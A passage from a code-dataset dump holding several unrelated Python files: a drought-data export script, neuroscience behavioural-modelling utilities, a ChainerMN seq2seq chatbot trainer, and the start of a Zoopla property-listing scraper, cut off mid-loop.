== 'ml_drought':\n data_path = Path('data')\n else:\n data_path = Path('../data')\n\n exporter = ESACCIExporter(data_folder=data_path)\n exporter.export()\n\n\ndef export_s5():\n # if the working directory is alread ml_drought don't need ../data\n if Path('.').absolute().as_posix().split('/')[-1] == 'ml_drought':\n data_path = Path('data')\n else:\n data_path = Path('../data')\n\n granularity = 'hourly'\n pressure_level = False\n\n exporter = S5Exporter(\n data_folder=data_path,\n granularity=granularity,\n pressure_level=pressure_level,\n )\n variable = 'total_precipitation'\n min_year = 1993\n max_year = 2014\n min_month = 1\n max_month = 12\n max_leadtime = None\n pressure_levels = [200, 500, 925]\n n_parallel_requests = 20\n\n exporter.export(\n variable=variable,\n min_year=min_year,\n max_year=max_year,\n min_month=min_month,\n max_month=max_month,\n max_leadtime=max_leadtime,\n pressure_levels=pressure_levels,\n n_parallel_requests=n_parallel_requests,\n )\n\n\ndef export_kenya_boundaries():\n # if the working directory is alread ml_drought don't need ../data\n if Path('.').absolute().as_posix().split('/')[-1] == 'ml_drought':\n data_path = Path('data')\n else:\n data_path = Path('../data')\n\n exporter = KenyaAdminExporter(data_path)\n exporter.export()\n\n\nif __name__ == '__main__':\n export_era5()\n export_vhi()\n export_chirps()\n export_era5POS()\n export_gleam()\n export_esa()\n export_s5()\n export_kenya_boundaries()\n","sub_path":"scripts/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":5877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"523884698","text":"from one.api import ONE\nimport numpy as np\nfrom scipy.special import digamma, betainc, logsumexp\nimport pickle\nimport os, sys\nfrom itertools import accumulate\nimport sobol_seq\nfrom scipy.stats import truncnorm, norm\n\ndef format_input(stimuli_arr, actions_arr, stim_sides_arr):\n # get maximum number of trials across sessions\n max_len = np.array([len(stimuli_arr[k]) for k in range(len(stimuli_arr))]).max()\n # pad with 0 such that we obtain nd arrays of size nb_sessions x nb_trials and convert to arrays\n stimuli = np.array([np.concatenate((stimuli_arr[k], np.zeros(max_len-len(stimuli_arr[k])))) for k in range(len(stimuli_arr))])\n actions = np.array([np.concatenate((actions_arr[k], np.zeros(max_len-len(actions_arr[k])))) for k in range(len(actions_arr))])\n stim_side = np.array([np.concatenate((stim_sides_arr[k], np.zeros(max_len-len(stim_sides_arr[k])))) for k in range(len(stim_sides_arr))])\n return stimuli, actions, stim_side\n\ndef look_up(dic, key, val):\n if key in dic.keys(): \n return dic[key]\n else:\n return val\n\ndef generate_stim():\n one = ONE()\n all_stimuli, all_dates = {}, {}\n mice_names, ins, ins_id, sess_id, time_stamps = get_bwm_ins_alyx(one)\n for idx in range(len(sess_id)):\n # data = load_session(sess_id[idx])\n # stim_side, stimuli, actions, pLeft_oracle = format_data(data)\n # all_stimuli[sess_id[idx]] = stim_side\n all_dates[sess_id[idx]] = time_stamps[sess_id==sess_id[idx]]\n #pickle.dump(all_stimuli, open('data/stimuli.pkl', 'wb'))\n pickle.dump(all_dates, open('data/all_dates.pkl', 'wb'))\n\ndef trunc_exp(n, tau, lb, ub):\n return np.exp(-n/tau) * (n >= lb) * (n <= ub)\n\ndef hazard_f(x, tau, lb, ub):\n return trunc_exp(x, tau, lb, ub)/np.sum(trunc_exp(np.linspace(x,x+ub,ub+1), tau, lb, ub), axis=0)\n\ndef perform_inference(stim_side, tau=60, gamma=0.8, lb=20, ub=100):\n\n nb_trials, nb_blocklengths, nb_typeblocks = len(stim_side), ub, 3\n h = np.zeros([nb_trials, nb_blocklengths, nb_typeblocks])\n priors = np.zeros([nb_trials, nb_blocklengths, nb_typeblocks]) - np.inf \n # at the beginning of the task (0), current length is 1 (0) and block type is unbiased (1)\n h[0, 0, 1], priors[0, 0, 1] = 0, 0\n hazard = hazard_f(np.arange(1, ub + 1), tau=tau, lb=lb, ub=ub)\n l = np.concatenate((np.expand_dims(hazard, -1), np.concatenate(\n (np.diag(1 - hazard[:-1]), np.zeros(len(hazard)-1)[np.newaxis]), axis=0)), axis=-1)\n b = np.zeros([len(hazard), 3, 3])\n b[1:][:,0,0], b[1:][:,1,1], b[1:][:,2,2] = 1, 1, 1 # case when l_t > 0\n b[0][0][-1], b[0][-1][0], b[0][1][np.array([0, 2])] = 1, 1, 1./2 # case when l_t = 1\n # transition matrix l_{t-1}, b_{t-1}, l_t, b_t\n t = np.log(np.swapaxes(l[:,:,np.newaxis,np.newaxis]\n * b[np.newaxis], 1, 2)).reshape(nb_typeblocks * nb_blocklengths, -1)\n priors = priors.reshape(-1, nb_typeblocks * nb_blocklengths)\n h = h.reshape(-1, nb_typeblocks * nb_blocklengths)\n\n for i_trial in range(nb_trials):\n s = stim_side[i_trial]\n loglks = np.log(np.array([gamma*(s==-1) + (1-gamma)\n * (s==1), 1./2, gamma*(s==1) + (1-gamma)*(s==-1)]))\n\n # save priors\n if i_trial > 0:\n priors[i_trial] = logsumexp(h[i_trial - 1][:, np.newaxis] + t, axis=(0))\n h[i_trial] = priors[i_trial] + np.tile(loglks, ub)\n\n priors = priors - np.expand_dims(logsumexp(priors, axis=1), -1)\n h = h - np.expand_dims(logsumexp(h, axis=1), -1)\n priors = priors.reshape(-1, nb_blocklengths, nb_typeblocks)\n h = h.reshape(-1, nb_blocklengths, nb_typeblocks)\n marginal_blocktype = np.exp(priors).sum(axis=1)\n marginal_currentlength = np.exp(priors).sum(axis=2) \n pLeft_inferred = marginal_blocktype[:, 0] * (1 - gamma) + marginal_blocktype[:, 1] * 0.5 + marginal_blocktype[:, 2] * gamma\n\n return pLeft_inferred, marginal_blocktype, marginal_currentlength, priors, h\n\n\ndef format_data(data):\n stim_side = (np.isnan(data['contrastLeft'])==False) * 1 - (np.isnan(data['contrastRight'])==False) * 1\n stimuli = np.zeros(len(stim_side))\n stimuli[np.isnan(data['contrastLeft'])==False] = data['contrastLeft'][np.isnan(data['contrastLeft'])==False]\n stimuli[np.isnan(data['contrastRight'])==False] = -data['contrastRight'][np.isnan(data['contrastRight'])==False]\n actions = data['choice']\n pLeft_oracle = data['probabilityLeft']\n return stim_side, stimuli, actions, pLeft_oracle\n\ndef get_bwm_ins_alyx(one=None):\n import datetime\n \"\"\"\n Return insertions that match criteria :\n - project code\n - session QC not critical (TODO may need to add probe insertion QC)\n - at least 1 alignment\n - behavior pass\n :return:\n ins: dict containing the full details on insertion as per the alyx rest query\n ins_id: list of insertions eids\n sess_id: list of (unique) sessions eids\n \"\"\"\n if one is None:\n one = ONE()\n ins = one.alyx.rest('insertions', 'list',\n django='session__project__name__icontains,ibl_neuropixel_brainwide_01,'\n 'session__qc__lt,50,'\n 'json__extended_qc__alignment_count__gt,0,'\n 'session__extended_qc__behavior,1')\n ins_id = [item['id'] for item in ins]\n sess_id = [item['session_info']['id'] for item in ins]\n mice_names = np.array([item['session_info']['subject'] for item in ins])\n sess_id, i = np.unique(sess_id, return_index=True)\n time_stamps = []\n for item in ins:\n s = (item['session_info']['start_time'].split(':')[0] + ':' + item['session_info']['start_time'].split(':')[1])\n time_stamps.append(datetime.datetime.strptime(s, '%Y-%m-%dT%H:%M').timestamp())\n return mice_names[i], np.array(ins)[i], np.array(ins_id)[i], sess_id, np.array(time_stamps)[i]\n\n\ndef load_session(sess_id, one=None):\n if one is None:\n one = ONE()\n\n trialstypes = ['choice',\n 'probabilityLeft',\n 'feedbackType',\n 'feedback_times',\n 'contrastLeft',\n 'contrastRight',\n 'goCue_times',\n 'stimOn_times',]\n\n tmp = one.load_object(sess_id, 'trials')\n # Break container out into a dict with labels\n trialdata = {k: tmp[k] for k in trialstypes}\n\n return trialdata\n\ndef exceedance_proba(alpha, Nsamp=1e6):\n\n # Compute exceedance probabilities for a Dirichlet distribution\n # FORMAT xp = spm_dirichlet_exceedance(alpha,Nsamp)\n # \n # Input:\n # alpha - Dirichlet parameters\n # Nsamp - number of samples used to compute xp [default = 1e6]\n # \n # Output:\n # xp - exceedance probability\n #__________________________________________________________________________\n #\n # This function computes exceedance probabilities, i.e. for any given model\n # k1, the probability that it is more likely than any other model k2. \n # More formally, for k1=1..Nk and for all k2~=k1, it returns p(x_k1>x_k2) \n # given that p(x)=dirichlet(alpha).\n # \n # Refs:\n # Stephan KE, Penny WD, Daunizeau J, Moran RJ, Friston KJ\n # Bayesian Model Selection for Group Studies. NeuroImage (in press)\n #__________________________________________________________________________\n # charles.findling\n # this is a translation from matlab to code. We tried to keep the structure\n # the closest possible to the original script\n\n Nk = len(alpha)\n xp = np.zeros(Nk)\n\n for i in range(Nsamp):\n # Sample from univariate gamma densities then normalise\n # (see Dirichlet entry in Wikipedia or Ferguson (1973) Ann. Stat. 1,\n # 209-230)\n #----------------------------------------------------------------------\n\n r = np.zeros(Nk)\n for k in range(Nk):\n r[k] = np.random.gamma(alpha[k], 1)\n\n sr = np.sum(r)\n for k in range(Nk):\n r[k] = r[k]/sr\n\n # Exceedance probabilities:\n # For any given model k1, compute the probability that it is more\n # likely than any other model k2~=k1\n # ----------------------------------------------------------------------\n xp[np.argmax(r)] += 1\n\n return xp/sum(xp)\n\n\ndef BMS_dirichlet(*args):\n # Bayesian model selection for group studies\n # FORMAT [alpha, exp_r, xp] = spm_BMS (lme, Nsamp, ecp, alpha0)\n # \n # INPUT:\n # lme - array of log model evidences \n # rows: subjects\n # columns: models (1..Nk)\n # Nsamp - number of samples used to compute exceedance probabilities\n # (default: 1e6)\n # do_plot - 1 to plot p(r|y)\n # sampling - use sampling to compute exact alpha\n # ecp - 1 to compute exceedance probability\n # alpha0 - [1 x Nk] vector of prior model counts\n # \n # OUTPUT:\n # alpha - vector of model probabilities\n # exp_r - expectation of the posterior p(r|y)\n # xp - exceedance probabilities\n # \n # REFERENCE:\n # Stephan KE, Penny WD, Daunizeau J, Moran RJ, Friston KJ (2009)\n # Bayesian Model Selection for Group Studies. NeuroImage 46:1004-1017\n #__________________________________________________________________________\n # charles.findling\n # this is a translation from matlab to code. We tried to keep the structure\n # the closest possible to the original script\n\n if len(args) < 1:\n return ValueError('Invalid number of arguments') \n\n max_val = np.finfo('float').max\n lme = args[0]\n Ni, Nk = lme.shape\n c = 1.\n cc = 1e-3\n log_u = np.zeros([Ni, Nk])\n u = np.zeros([Ni, Nk])\n g = np.zeros([Ni, Nk])\n beta = np.zeros(Nk)\n prev_alpha = np.zeros(Nk)\n exp_r = np.zeros(Nk)\n xp = np.zeros(Nk)\n\n if len(args) < 2:\n N_samp = int(1e6)\n else:\n N_samp = int(args[1])\n if len(args) < 3:\n ecp = 1\n else:\n ecp = args[2]\n\n # prior observations\n # --------------------------------------------------------------------\n if len(args) < 4:\n alpha0 = np.ones(Nk)\n else:\n alpha0 = args[3]\n alpha = np.array(alpha0)\n\n\n # iterative VB estimation\n # ---------------------------------------------------------------------\n\n while c > cc:\n\n # compute posterior belief g(i,k)=q(m_i=k|y_i) that model k generated\n # the data for the i-th subject\n for i in range(Ni):\n for k in range(Nk):\n # integrate out prior probabilities of models (in log space)\n log_u[i, k] = lme[i,k] + digamma(alpha[k]) - digamma(np.sum(alpha))\n\n # prevent overflow\n log_u[i, :] = log_u[i, :] - np.max(log_u[i,:])\n\n # prevent numerical problems for badly scaled posteriors\n for k in range(Nk):\n log_u[i,k] = np.sign(log_u[i,k]) * np.minimum(max_val, np.abs(log_u[i,k]))\n\n # exponentiate (to get back to non-log representation)\n u[i,:] = np.exp(log_u[i,:])\n\n # normalisation: sum across all models for i-th subject\n u_i = np.sum(u[i,:])\n g[i,:] = u[i,:]/u_i\n\n # expected number of subjects whose data we believe to have been \n # generated by model k\n for k in range(Nk):\n beta[k] = np.sum(g[:,k])\n\n # update alpha\n prev_alpha[:] = alpha\n for k in range(Nk):\n alpha[k] = alpha0[k] + beta[k]\n\n # convergence?\n c = np.sum(np.abs(alpha - prev_alpha))\n\n # Compute expectation of the posterior p(r|y)\n # --------------------------------------------------------------------------\n exp_r[:] = alpha/np.sum(alpha) \n\n # Compute exceedance probabilities p(r_i>r_j)\n # --------------------------------------------------------------------------\n\n if ecp:\n if Nk == 2:\n # comparison of 2 models\n xp[0] = betainc(alpha[1], alpha[0], .5)\n xp[1] = betainc(alpha[0], alpha[1], .5)\n else:\n # comparison of >2 models: use sampling approach\n xp = exceedance_proba(alpha, N_samp)\n\n return [alpha, exp_r, xp]\n\ndef estimate_Beta(theta, weights):\n loc = np.sum(theta * weights)\n scale2 = np.sum(weights * ((theta - loc)**2))\n a = ( (1 - loc)/scale2 - 1/loc ) * (loc**2)\n b = a * (1 / loc - 1)\n return np.maximum(a, 1), np.maximum(b, 1)\n\ndef estimate_Gamma(theta, weights): # gamma for precision of normal = 1./var\n loc = np.sum(theta * weights)\n scale2 = np.sum(weights * ((theta - loc)**2))\n a = (loc**2)/scale2\n b = loc/scale2\n return a, 1/b\n\n\nimport torch\nimport gc\ndef get_cuda_variable():\n for obj in gc.get_objects():\n try:\n if torch.is_tensor(obj) or (hasattr(obj, 'data') and torch.is_tensor(obj.data)):\n print(type(obj), obj.size())\n except:\n pass\n\nimport subprocess\ndef get_gpu_memory_map():\n result = subprocess.check_output(\n [\n 'nvidia-smi', '--query-gpu=memory.used',\n '--format=csv,nounits,noheader'\n ])\n \n return float(result)\n\ndef make_transparent(plt):\n plt.gca().spines['right'].set_visible(False)\n plt.gca().spines['top'].set_visible(False)\n plt.gca().spines['bottom'].set_visible(False)\n plt.gca().spines['left'].set_visible(False)\n plt.xticks([], [])\n plt.yticks([], [])\n\ndef clean_up(plt):\n plt.gca().spines['right'].set_visible(False)\n plt.gca().spines['top'].set_visible(False)\n\n","sub_path":"models/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"165005772","text":"# coding: utf-8\n\"\"\"\nSequence to Sequenceのchainer実装\n\nSutskever, Ilya, Oriol Vinyals, and Quoc V. Le.,\n\"Sequence to sequence learning with neural networks.\",\nAdvances in neural information processing systems. 2014.\n\"\"\"\n\nimport numpy as np\nfrom chainer import Chain, Variable, cuda, functions, links, optimizer, optimizers, serializers\nimport datetime\nimport random\nimport argparse\nimport sampleSeq2Seq_data\nimport chainermn\nimport mpi4py\nimport chainer\n\nEMBED=300\nHIDDEN=150\nBATCH=40\nEPOCH=20\n\n\nclass LSTM_Encoder(Chain):\n def __init__(self, vocab_size, embed_size, hidden_size):\n \"\"\"\n クラスの初期化\n :param vocab_size: 使われる単語の種類数(語彙数)\n :param embed_size: 単語をベクトル表現した際のサイズ\n :param hidden_size: 隠れ層のサイズ\n \"\"\"\n super(LSTM_Encoder, self).__init__(\n xe = links.EmbedID(vocab_size, embed_size, ignore_label=-1),\n eh = links.Linear(embed_size, 4 * hidden_size),\n hh = links.Linear(hidden_size, 4 * hidden_size)\n )\n\n def __call__(self, x, c, h):\n \"\"\"\n\n :param x: one-hotな単語\n :param c: 内部メモリ\n :param h: 隠れ層\n :return: 次の内部メモリ、次の隠れ層\n \"\"\"\n e = functions.tanh(self.xe(x))\n return functions.lstm(c, self.eh(e) + self.hh(h))\n\nclass LSTM_Decoder(Chain):\n def __init__(self, vocab_size, embed_size, hidden_size):\n \"\"\"\n クラスの初期化\n :param vocab_size: 使われる単語の種類数(語彙数)\n :param embed_size: 単語をベクトル表現した際のサイズ\n :param hidden_size: 隠れ層のサイズ\n \"\"\"\n super(LSTM_Decoder, self).__init__(\n ye = links.EmbedID(vocab_size, embed_size, ignore_label=-1),\n eh = links.Linear(embed_size, 4 * hidden_size),\n hh = links.Linear(hidden_size, 4 * hidden_size),\n he = links.Linear(hidden_size, embed_size),\n ey = links.Linear(embed_size, vocab_size)\n )\n\n def __call__(self, y, c, h):\n \"\"\"\n\n :param y: one-hotな単語\n :param c: 内部メモリ\n :param h: 隠れそう\n :return: 予測単語、次の内部メモリ、次の隠れ層\n \"\"\"\n e = functions.tanh(self.ye(y))\n c, h = functions.lstm(c, self.eh(e) + self.hh(h))\n t = self.ey(functions.tanh(self.he(h)))\n return t, c, h\n\nclass Seq2Seq(Chain):\n def __init__(self, vocab_size, embed_size, hidden_size, batch_size, gpu):\n \"\"\"\n Seq2Seqの初期化\n :param vocab_size: 語彙サイズ\n :param embed_size: 単語ベクトルのサイズ\n :param hidden_size: 中間ベクトルのサイズ\n :param batch_size: ミニバッチのサイズ\n :param flag_gpu: GPUを使うかどうか\n \"\"\"\n super(Seq2Seq, self).__init__(\n # Encoderのインスタンス化\n encoder = LSTM_Encoder(vocab_size, embed_size, hidden_size),\n # Decoderのインスタンス化\n decoder = LSTM_Decoder(vocab_size, embed_size, hidden_size)\n )\n self.vocab_size = vocab_size\n self.embed_size = embed_size\n self.hidden_size = hidden_size\n self.batch_size = batch_size\n # GPUで計算する場合はcupyをCPUで計算する場合はnumpyを使う\n if gpu>=0:\n self.ARR = cuda.cupy\n else:\n self.ARR = np\n\n def encode(self, words):\n \"\"\"\n Encoderを計算する部分\n :param words: 単語が記録されたリスト\n :return:\n \"\"\"\n # 内部メモリ、中間ベクトルの初期化\n c = Variable(self.ARR.zeros((self.batch_size, self.hidden_size), dtype='float32'))\n h = Variable(self.ARR.zeros((self.batch_size, self.hidden_size), dtype='float32'))\n\n # エンコーダーに単語を順番に読み込ませる\n for w in words:\n c, h = self.encoder(w, c, h)\n\n # 計算した中間ベクトルをデコーダーに引き継ぐためにインスタンス変数にする\n self.h = h\n # 内部メモリは引き継がないので、初期化\n self.c = Variable(self.ARR.zeros((self.batch_size, self.hidden_size), dtype='float32'))\n\n def decode(self, w):\n \"\"\"\n デコーダーを計算する部分\n :param w: 単語\n :return: 単語数サイズのベクトルを出力する\n \"\"\"\n t, self.c, self.h = self.decoder(w, self.c, self.h)\n return t\n\n def reset(self):\n \"\"\"\n 中間ベクトル、内部メモリ、勾配の初期化\n :return:\n \"\"\"\n self.h = Variable(self.ARR.zeros((self.batch_size, self.hidden_size), dtype='float32'))\n self.c = Variable(self.ARR.zeros((self.batch_size, self.hidden_size), dtype='float32'))\n\n self.zerograds()\n\n\ndef forward(enc_words, dec_words, model, ARR, dict):\n \"\"\"\n 順伝播の計算を行う関数\n :param enc_words: 発話文の単語を記録したリスト\n :param dec_words: 応答文の単語を記録したリスト\n :param model: Seq2Seqのインスタンス\n :param ARR: cuda.cupyかnumpyか\n :return: 計算した損失の合計\n \"\"\"\n # バッチサイズを記録\n batch_size = len(enc_words[0])\n # model内に保存されている勾配をリセット\n model.reset()\n # 発話リスト内の単語を、chainerの型であるVariable型に変更\n enc_words = [Variable(ARR.array(row, dtype='int32')) for row in enc_words]\n # エンコードの計算 ①\n model.encode(enc_words)\n # 損失の初期化\n loss = Variable(ARR.zeros((), dtype='float32'))\n # をデコーダーに読み込ませる ②\n t = Variable(ARR.array([dict[\"\"] for _ in range(batch_size)], dtype='int32'))\n # デコーダーの計算\n for w in dec_words:\n # 1単語ずつをデコードする ③\n y = model.decode(t)\n # 正解単語をVariable型に変換\n t = Variable(ARR.array(w, dtype='int32'))\n # 正解単語と予測単語を照らし合わせて損失を計算 ④\n loss += functions.softmax_cross_entropy(y, t)\n return loss\n\ndef forward_test(enc_words, model, ARR, dict):\n ret = []\n model.reset()\n enc_words = [Variable(ARR.array(row, dtype='int32')) for row in enc_words]\n model.encode(enc_words)\n t = Variable(ARR.array([0], dtype='int32'))\n y = model.decode(t)\n label = y.data.argmax()\n ret.append(label)\n\n counter = 0\n while True:\n y = model.decode(t)\n label = y.data.argmax()\n ret.append(label)\n t = Variable(ARR.array([label], dtype='int32'))\n if label == dict[\"\"]:\n break\n return ret\n\n# trainの関数\ndef make_minibatch(minibatch):\n # enc_wordsの作成\n enc_words = [row[0] for row in minibatch]\n enc_max = np.max([len(row) for row in enc_words])\n enc_words = np.array([[-1]*(enc_max - len(row)) + row for row in enc_words], dtype='int32')\n enc_words = enc_words.T\n\n # dec_wordsの作成\n dec_words = [row[1] for row in minibatch]\n dec_max = np.max([len(row) for row in dec_words])\n dec_words = np.array([row + [-1]*(dec_max - len(row)) for row in dec_words], dtype='int32')\n dec_words = dec_words.T\n return enc_words, dec_words\n\ndef load_data(infile):\n data=[]\n # データの読み込み\n with open(infile,\"r\") as f:\n for line in f.readlines():\n wakati=[]\n for str in line.replace(\"\\n\",\"\").split(\"\\t\"):\n w=str.split(\" \") #[]\n wakati.append(w) # [[],[]]\n data.append(wakati) #[[[],[]],[[],[]],...\n return(data)\n\n\n\ndef train(datafile,dictfile,modelfile,gpu,embed,hidden,batchsize,epoch,communicator):\n\n dict=sampleSeq2Seq_data.load_dict(dictfile)\n data=load_data(datafile)\n\n # 語彙数\n vocab_size = len(dict.keys())\n # モデルのインスタンス化\n model = Seq2Seq(vocab_size=vocab_size,\n embed_size=embed,\n hidden_size=hidden,\n batch_size=batchsize,\n gpu=gpu)\n model.reset()\n # GPUのセット\n if gpu>=0:\n ARR = cuda.cupy\n cuda.get_device_from_id(gpu).use()\n model.to_gpu(gpu)\n\n if communicator == 'naive':\n print(\"Error: 'naive' communicator does not support GPU.\\n\")\n exit(-1)\n comm = chainermn.create_communicator(communicator)\n #device = comm.intra_rank\n else:\n ARR = np\n if communicator != 'naive':\n print('Warning: using naive communicator '\n 'because only naive supports CPU-only execution')\n comm = chainermn.create_communicator('naive')\n #device = -1\n\n\n if comm.mpi_comm.rank == 0:\n print('==========================================')\n print('Num process (COMM_WORLD): {}'.format(mpi4py.MPI.COMM_WORLD.Get_size()))\n if gpu>=0:\n print('Using GPUs')\n print('Using {} communicator'.format(communicator))\n print('Num Minibatch-size: {}'.format(batchsize))\n print('Num epoch: {}'.format(epoch))\n print('==========================================')\n\n\n random.seed(123)\n\n # Create a multi node optimizer from a standard Chainer optimizer.\n optimizer = chainermn.create_multi_node_optimizer(\n chainer.optimizers.Adam(), comm)\n optimizer.setup(model)\n\n # Split and distribute the dataset. Only worker 0 loads the whole dataset.\n # Datasets of worker 0 are evenly split and distributed to all workers.\n if comm.rank == 0:\n train = chainer.datasets.get_mnist()\n else:\n train = None, None\n train = chainermn.scatter_dataset(train, comm, shuffle=True)\n\n train_iter = chainer.iterators.SerialIterator(train, batchsize)\n\n updater = chainer.training.StandardUpdater(train_iter, optimizer, device=gpu)\n trainer = chainer.training.Trainer(updater, (epoch, 'epoch'), out=args.out)\n\n # Create a multi node evaluator from a standard Chainer evaluator.\n evaluator = chainermn.create_multi_node_evaluator(evaluator, comm)\n trainer.extend(evaluator)\n\n # Some display and output extensions are necessary only for one worker.\n # (Otherwise, there would just be repeated outputs.)\n if comm.rank == 0:\n trainer.extend(chainer.training.extensions.dump_graph('main/loss'))\n trainer.extend(chainer.training.extensions.LogReport())\n trainer.extend(chainer.training.extensions.PrintReport(\n ['epoch', 'main/loss', 'validation/main/loss',\n 'main/accuracy', 'validation/main/accuracy', 'elapsed_time']))\n trainer.extend(chainer.training.extensions.ProgressBar())\n\n trainer.run()\n serializers.save_hdf5(modelfile, model)\n\n\n\n\n\n\n\n \"\"\"\n # 学習開始\n for epoch in range(epoch):\n # ファイルのパスの取得\n # エポックごとにoptimizerの初期化\n opt = optimizers.Adam()\n opt.setup(model)\n opt.add_hook(optimizer.GradientClipping(5))\n\n random.shuffle(data)\n for num in range(len(data)//batchsize):\n #print(str(num))\n minibatch = data[num*batchsize: (num+1)*batchsize]\n # 読み込み用のデータ作成\n enc_words, dec_words = make_minibatch(minibatch)\n # modelのリセット\n model.reset()\n # 順伝播\n total_loss = forward(enc_words=enc_words,\n dec_words=dec_words,\n model=model,\n ARR=ARR,\n dict=dict)\n # 学習\n total_loss.backward()\n opt.update()\n #opt.zero_grads()\n # print (datetime.datetime.now())\n print ('Epoch %s 終了' % (epoch+1))\n\n serializers.save_hdf5(modelfile+\".\"+str(epoch), model)\n serializers.save_hdf5(modelfile, model)\n \"\"\"\n\ndef test(datafile,dictfile,modelfile,gpu):\n\n dict=sampleSeq2Seq_data.load_dict(dictfile)\n\n\n # モデルのインスタンス化\n model = Seq2Seq(vocab_size=len(dict.keys()),\n embed_size=EMBED,\n hidden_size=HIDDEN,\n batch_size=1,\n gpu=gpu)\n serializers.load_hdf5(modelfile,model)\n\n data=[] # [[\"a\",\"b\",..],[\"c\",\"d\",..],..]\n with open(datafile,\"r\") as f:\n for line in f.readlines():\n items=sampleSeq2Seq_data.wakati_list(line,dict,True,False)\n data.append(items)\n\n\n if gpu>=0:\n ARR = cuda.cupy\n cuda.get_device_from_id(gpu).use()\n model.to_gpu(gpu)\n else:\n ARR = np\n\n # change key and val,\n # http://www.lifewithpython.com/2014/03/python-invert-keys-values-in-dict.html\n dict_inv={v:k for k,v in dict.items()}\n for dt in data:\n enc_word=np.array([dt],dtype=\"int32\").T\n predict=forward_test(enc_words=enc_word,model=model,ARR=ARR,dict=dict)\n dt.reverse()\n inword=to_word(dt,dict_inv)\n outword=to_word(predict,dict_inv)\n print(\"input:\"+str(inword)+\",output:\"+str(outword))\n\ndef to_word(id_list,dict):\n res=[]\n for id in id_list:\n res.append(dict[id])\n return (res)\n\ndef main():\n p = argparse.ArgumentParser(description='seq2seq')\n\n\n #p.add_argument('--mode', default=\"test\",help='train or test')\n #p.add_argument('--data', default=\"/Volumes/DATA/data/chat/txt/test.txt\",help='in the case of input this file has two sentences a column, in the case of output this file has one sentence a column ')\n p.add_argument('--mode', default=\"train\",choices=[\"train\",\"test\"], help='train or test')\n p.add_argument('--data', default=\"/Volumes/DATA/data/chat/txt/init.txt\",help='in the case of input this file has two sentences a column, in the case of output this file has one sentence a column ')\n p.add_argument('--dict', default=\"/Volumes/DATA/data/chat/txt/init.dict\",help='word dictionay file, word and word id ')\n p.add_argument('--model',default=\"/Volumes/DATA/data/chat/txt/init.model\",help=\"in the case of train mode this file is output,in the case of test mode this file is input\")\n p.add_argument('-g','--gpu',default=-1, type=int)\n p.add_argument('--embed',default=EMBED, type=int,help=\"only train mode\")\n p.add_argument('--hidden',default=HIDDEN, type=int, help=\"only train mode\")\n p.add_argument('--batch',default=BATCH, type=int, help=\"only train mode\")\n p.add_argument('--epoch',default=EPOCH, type=int, help=\"only train mode\")\n p.add_argument('--communicator', type=str, default='hierarchical', help='Type of communicator')\n p.add_argument('--outdir', type=str, default='/Volumes/DATA/data/chat/outfiles/', help='Type of communicator')\n args = p.parse_args()\n\n print ('開始: ', datetime.datetime.now())\n try:\n if args.mode == \"train\":\n train(args.data,args.dict,args.model,args.gpu,args.embed,args.hidden,args.batch,args.epoch,args.communicator)\n else:\n test(args.data,args.dict,args.model,args.gpu)\n except:\n import traceback\n print( traceback.format_exc())\n\n print ('終了: ', datetime.datetime.now())\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"sampleSeq2SeqMN.py","file_name":"sampleSeq2SeqMN.py","file_ext":"py","file_size_in_byte":15458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"574164228","text":"#https://www.zoopla.co.uk/for-sale/houses/edinburgh/?q=Edinburgh&radius=40&results_sort=newest_listings&search_source=refine\n#https://www.zoopla.co.uk/for-sale/houses/edinburgh/?identifier=edinburgh&property_type=houses&q=Edinburgh&search_source=refine&radius=40&pn=2\n\nimport requests \nfrom bs4 import BeautifulSoup, SoupStrainer\nimport pandas\nimport re \nimport numpy as np\nimport os\nimport datetime\nfrom copy import deepcopy\nfrom tqdm import tqdm\nfrom datetime import datetime\n\nimport storage\n\nprint(\"\\nProperty data scraper. UK cities only.\\n\")\nsearch_time = datetime.now().strftime(\"%Y-%m-%d_%H%M\")\n\ncity = input(\"Enter city name: \")\nradius = input(\"Enter geographic search radius (maximum 40): \")\n\naccepted_radii = [1, 3, 5, 10, 15, 20, 30, 40]\n\nif int(radius) not in accepted_radii:\n print(\"Radius must be 40 or less\")\n print(\"Enter one of the following: 1, 3, 5, 10, 15, 20, 30, 40\")\n radius = input(\"Re-enter search radius: \") \n\nheaders = {'User-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0'}\n\nr = requests.get(f\"https://www.zoopla.co.uk/for-sale/houses/{city}/?identifier={city}&property_type=houses&q={city}&search_source=refine&radius={radius}&pn=1\", headers=headers)\nc = r.content\nsoup = BeautifulSoup(c, \"html.parser\")\nall = soup.find_all(\"div\", {\"class\":\"listing-results-wrapper\"})\n\n\nfor page in soup.find_all(\"div\", {\"class\":\"paginate bg-muted\"}):\n numpages = page.find_all(\"a\")[-2].text\n\nprint(str(numpages) + \" pages of results...\\n\")\n\n\nif len(all) < 1:\n print(\"\\nNothing found. Ensure city name entered correctly.\")\n\ni = 0\nproplist = []\nbase_url=f\"https://www.zoopla.co.uk/for-sale/houses/{city}/?identifier={city}&page_size=100&property_type=houses&q={city}&search_source=refine&radius={radius}&pn=\"\nchars=\"qwertyuiopasdfghjklzxcvbnm,\"\n\nif int(numpages) > 50:\n cont = input(\"Over 50 pages of results. Are you sure you wish to continue? y/n: \")\n if \"y\" in cont:\n pass\n else:\n print(\"Program terminated\")\n exit()\n\nprint(\"\\nScanning \" + str(numpages) + \" pages...\\n\")\n\nfor page in tqdm(range(1, int(numpages)+1, 1)):\n r = requests.get(base_url + str(page))\n c = r.content\n soup=BeautifulSoup(c, \"lxml\")\n all = soup.find_all(\"div\", {\"class\":\"listing-results-wrapper\"})\n\n for item in all:\n\n property = {}\n i += 1\n\n property[\"Date_Listed\"]=item.find(\"p\", {\"class\":\"top-half listing-results-marketed\"}).find(\"small\").text.replace(\" \", \"\").replace(\"\\n\", \"\").replace(\"Listedon\", \"\").replace(\"by\", \"\")\n try:\n property[\"Price\"] = item.find(\"a\", {\"class\":\"listing-results-price text-price\"}).text.replace(\"\\n\", \"\").replace(\"Offersinregionof\", \"\").replace(\" \", \"\").replace(\"Offersover\", \"\")\n 